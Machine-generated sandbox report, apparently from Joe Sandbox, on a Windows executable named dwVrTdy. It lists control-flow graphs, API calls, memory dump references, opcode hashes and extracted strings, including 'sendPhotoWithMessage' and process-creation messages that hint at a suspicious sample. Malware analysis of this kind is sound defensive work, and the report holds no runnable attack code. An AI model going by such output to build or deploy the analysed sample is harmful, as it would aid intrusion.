7172 7ff643f2ab11-7ff643f2ab23 7169->7172 7173 7ff643f2ab43-7ff643f2ab62 7169->7173 7176 7ff643f2ab3e call 7ff643f62790 7172->7176 7177 7ff643f2ab25-7ff643f2ab38 7172->7177 7173->7121 7174 7ff643f2ab64-7ff643f2ab7b 7173->7174 7178 7ff643f2ab96 call 7ff643f62790 7174->7178 7179 7ff643f2ab7d-7ff643f2ab90 7174->7179 7176->7173 7177->7118 7177->7176 7178->7121 7179->7136 7179->7178
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: 1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
                                                                                                                                                                                                                                                                                          • API String ID: 1686256323-4148110692
                                                                                                                                                                                                                                                                                          • Opcode ID: bbfa7b615f8a2897cdd336dbb51fca4bcc0a43af47892d00125171a54d80ca7c
                                                                                                                                                                                                                                                                                          • Instruction ID: bd5b8704691e9cd187908cbadaa0cb1f32af8f15278ab136b1c3deb4c863d20c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbfa7b615f8a2897cdd336dbb51fca4bcc0a43af47892d00125171a54d80ca7c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EE1B262A1CBC5C2DAA0BB25E6413AE7361FB85BA0F148232DA9D937D5DF3DD481D700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                          • String ID: Failed to start process. Error: $Process started successfully.
                                                                                                                                                                                                                                                                                          • API String ID: 1451358647-594763798
                                                                                                                                                                                                                                                                                          • Opcode ID: 1d8fb6cd50ae36ec0fdab3cc94966e204139c79170fe90e2a8376b911ced0ee7
                                                                                                                                                                                                                                                                                          • Instruction ID: e89876a6114eaa1fc5875fc4ab8fd9fb0e06afa51d029cce0c499e8f78665e89
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8fb6cd50ae36ec0fdab3cc94966e204139c79170fe90e2a8376b911ced0ee7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8851A172E1CB8582EA40FB64E44126D6361EBD57A4F505336EAAC67AE9DF7CE080D700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 7434 7ff643f7ba50-7ff643f7ba76 7435 7ff643f7ba78-7ff643f7ba8c call 7ff643f71654 call 7ff643f71674 7434->7435 7436 7ff643f7ba91-7ff643f7ba95 7434->7436 7450 7ff643f7be82 7435->7450 7438 7ff643f7be6b-7ff643f7be77 call 7ff643f71654 call 7ff643f71674 7436->7438 7439 7ff643f7ba9b-7ff643f7baa2 7436->7439 7457 7ff643f7be7d call 7ff643f6cd10 7438->7457 7439->7438 7441 7ff643f7baa8-7ff643f7bad6 7439->7441 7441->7438 7444 7ff643f7badc-7ff643f7bae3 7441->7444 7447 7ff643f7bafc-7ff643f7baff 7444->7447 7448 7ff643f7bae5-7ff643f7baf7 call 7ff643f71654 call 7ff643f71674 7444->7448 7453 7ff643f7be67-7ff643f7be69 7447->7453 7454 7ff643f7bb05-7ff643f7bb0b 7447->7454 7448->7457 7455 7ff643f7be85-7ff643f7be9c 7450->7455 7453->7455 7454->7453 7458 7ff643f7bb11-7ff643f7bb14 7454->7458 7457->7450 7458->7448 7459 7ff643f7bb16-7ff643f7bb3b 7458->7459 7462 7ff643f7bb3d-7ff643f7bb3f 7459->7462 7463 7ff643f7bb6e-7ff643f7bb75 7459->7463 7465 7ff643f7bb66-7ff643f7bb6c 7462->7465 7466 7ff643f7bb41-7ff643f7bb48 7462->7466 7467 7ff643f7bb4a-7ff643f7bb61 call 7ff643f71654 call 7ff643f71674 call 7ff643f6cd10 7463->7467 7468 7ff643f7bb77-7ff643f7bb9f call 7ff643f7a168 call 7ff643f78340 * 2 7463->7468 7470 7ff643f7bbec-7ff643f7bc03 7465->7470 7466->7465 7466->7467 7499 7ff643f7bcf4 7467->7499 7495 7ff643f7bbbc-7ff643f7bbe7 call 7ff643f7c110 7468->7495 7496 7ff643f7bba1-7ff643f7bbb7 call 7ff643f71674 call 7ff643f71654 7468->7496 7473 7ff643f7bc05-7ff643f7bc0d 7470->7473 7474 7ff643f7bc7e-7ff643f7bc88 call 7ff643f849cc 7470->7474 7473->7474 7478 7ff643f7bc0f-7ff643f7bc11 7473->7478 7486 7ff643f7bd12 7474->7486 7487 7ff643f7bc8e-7ff643f7bca3 7474->7487 7478->7474 7483 7ff643f7bc13-7ff643f7bc29 7478->7483 7483->7474 7488 7ff643f7bc2b-7ff643f7bc37 7483->7488 7491 7ff643f7bd17-7ff643f7bd37 ReadFile 7486->7491 7487->7486 7493 7ff643f7bca5-7ff643f7bcb7 GetConsoleMode 7487->7493 7488->7474 7489 7ff643f7bc39-7ff643f7bc3b 7488->7489 7489->7474 7494 7ff643f7bc3d-7ff643f7bc55 7489->7494 7497 7ff643f7bd3d-7ff643f7bd45 7491->7497 7498 7ff643f7be31-7ff643f7be3a GetLastError 7491->7498 7493->7486 7500 7ff643f7bcb9-7ff643f7bcc1 7493->7500 7494->7474 7502 7ff643f7bc57-7ff643f7bc63 7494->7502 7495->7470 7496->7499 7497->7498 7504 7ff643f7bd4b 7497->7504 7507 7ff643f7be3c-7ff643f7be52 call 7ff643f71674 call 7ff643f71654 7498->7507 7508 7ff643f7be57-7ff643f7be5a 7498->7508 7501 7ff643f7bcf7-7ff643f7bd01 call 7ff643f78340 7499->7501 7500->7491 7506 7ff643f7bcc3-7ff643f7bce5 ReadConsoleW 7500->7506 7501->7455 7502->7474 7510 7ff643f7bc65-7ff643f7bc67 7502->7510 7514 7ff643f7bd52-7ff643f7bd67 7504->7514 7516 7ff643f7bce7 GetLastError 7506->7516 7517 7ff643f7bd06-7ff643f7bd10 7506->7517 7507->7499 7511 7ff643f7bced-7ff643f7bcef call 7ff643f715e8 7508->7511 7512 7ff643f7be60-7ff643f7be62 7508->7512 7510->7474 7521 7ff643f7bc69-7ff643f7bc79 7510->7521 7511->7499 7512->7501 7514->7501 7523 7ff643f7bd69-7ff643f7bd74 7514->7523 7516->7511 7517->7514 7521->7474 7527 7ff643f7bd9b-7ff643f7bda3 7523->7527 7528 7ff643f7bd76-7ff643f7bd8f call 7ff643f7b668 7523->7528 7531 7ff643f7bda5-7ff643f7bdb7 7527->7531 7532 7ff643f7be1f-7ff643f7be2c call 7ff643f7b4a8 7527->7532 7534 7ff643f7bd94-7ff643f7bd96 7528->7534 7535 7ff643f7bdb9 7531->7535 7536 7ff643f7be12-7ff643f7be1a 7531->7536 7532->7534 7534->7501 7537 7ff643f7bdbe-7ff643f7bdc5 7535->7537 7536->7501 7539 7ff643f7bdc7-7ff643f7bdcb 7537->7539 7540 7ff643f7be01-7ff643f7be0c 7537->7540 7541 7ff643f7bdcd-7ff643f7bdd4 7539->7541 7542 7ff643f7bde7 7539->7542 7540->7536 7541->7542 7543 7ff643f7bdd6-7ff643f7bdda 7541->7543 7544 7ff643f7bded-7ff643f7bdfd 7542->7544 7543->7542 7545 7ff643f7bddc-7ff643f7bde5 7543->7545 7544->7537 7546 7ff643f7bdff 7544->7546 7545->7544 7546->7536
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
                                                                                                                                                                                                                                                                                          • Instruction ID: 51613648fe52081a6085c3aaeed6ab335d6db62bc28f59255e2f531ba25c73dc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AC1E322A2C68791EBE0BB1594462BD3B91FB86B80F594131EA4D973D1DF7CEC48E300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7710B
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F77141
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7716E
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7717F
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F77190
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F771AB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
                                                                                                                                                                                                                                                                                          • Instruction ID: 819d9430d42c1b7549fb118639cfab70dc2895a2465e730630d9152ef9ec2707
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83117F21B1D74282FAD4B731996707961529F48BB0F444734E87EEB7D6DFACA485A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: directory_iterator::directory_iterator$status
                                                                                                                                                                                                                                                                                          • API String ID: 250480979-2525534277
                                                                                                                                                                                                                                                                                          • Opcode ID: e924926e74b1e48795aa593d38f53b2165f424594b82fea1ebc7af6c74fc6ee7
                                                                                                                                                                                                                                                                                          • Instruction ID: 2ccc0a36fd63fa55bfeda2ba3eaee01e83aca3614bebe8ec73d941e90d16b440
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e924926e74b1e48795aa593d38f53b2165f424594b82fea1ebc7af6c74fc6ee7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6A1AF72F18B8586EB80FF65C4412AC23A1FB98B98F148631DE1DA7BD5DF38E5819740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 72aad7c02879c82d49760fbfc4497d18ca72b61b242aa3be7a9bcef67913a4cb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63213025A0D74286EED4BF65A41217AB250FF89BD0F040531DE4EE7B95DF3CE405A600
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF643F78023), ref: 00007FF643F78154
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF643F78023), ref: 00007FF643F781DF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                                                                                                                                          • Instruction ID: 145a0a102f2039d5f19ea89c7c9d54b714442e365c1466ce6625d25e9bc78fdb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2991C122A1CA5285F7E0FF6594422BD2BA0BB44B88F944139DE0EB7AD5DF38D446E700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-3882152299
                                                                                                                                                                                                                                                                                          • Opcode ID: ba6f30eea4c24a8097427f0aee587d163c1334a874c193fb46c97ed7f5b56304
                                                                                                                                                                                                                                                                                          • Instruction ID: 867ed7093200e483ec09770355bc59e9bc053983a1e90b4957efb60472f832b5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba6f30eea4c24a8097427f0aee587d163c1334a874c193fb46c97ed7f5b56304
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B351D062B0DB8682EE64EB55E6012796361EBB4BE4F108731DAAD637D1DF3CE480D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 071b645e5fc494ad45501c269137c8023e5938909f92c0e767069464d5e7bad0
                                                                                                                                                                                                                                                                                          • Instruction ID: 1d1c5af23ca8e0076e0e934aed26c02de3c6b20c72e31e9367ee2775d52a3ac0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071b645e5fc494ad45501c269137c8023e5938909f92c0e767069464d5e7bad0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F518A32A09B4596EB55AF2AD09126C33A0FB48B90F544532DB5DA3BE4DF3CE0B1E301
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                                                                                                                                          • Instruction ID: 6c39cb93a34d646f3867f1a7af3d67d843743fe9abec76fafc6ef3af3ea6ea44
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A91D362F0E71686FF94FA64D5126B862A0AF54788F402135ED0DE7AD5EF2DF8029340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 56456669-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 136d13d4139ea395e463f4cf206c3ce14e68f804bc637157810ea065fad1aa4e
                                                                                                                                                                                                                                                                                          • Instruction ID: 930f577939091c137ba72233f749786a7e8139c81360ce22296a1a7d5669ce12
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 136d13d4139ea395e463f4cf206c3ce14e68f804bc637157810ea065fad1aa4e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B510561F1C7C682EEA0BB19D1423BD9250EF857A0F405232DA5CA76D5DE6DF480EB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1346393832-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7c188323887dc589c4d67584065956a161218b031c349481a82824ce6a6b058d
                                                                                                                                                                                                                                                                                          • Instruction ID: 5c1583eab7d92ad6fab638f546d1799a8f215013f4c78330b5b0b096ca930cef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c188323887dc589c4d67584065956a161218b031c349481a82824ce6a6b058d
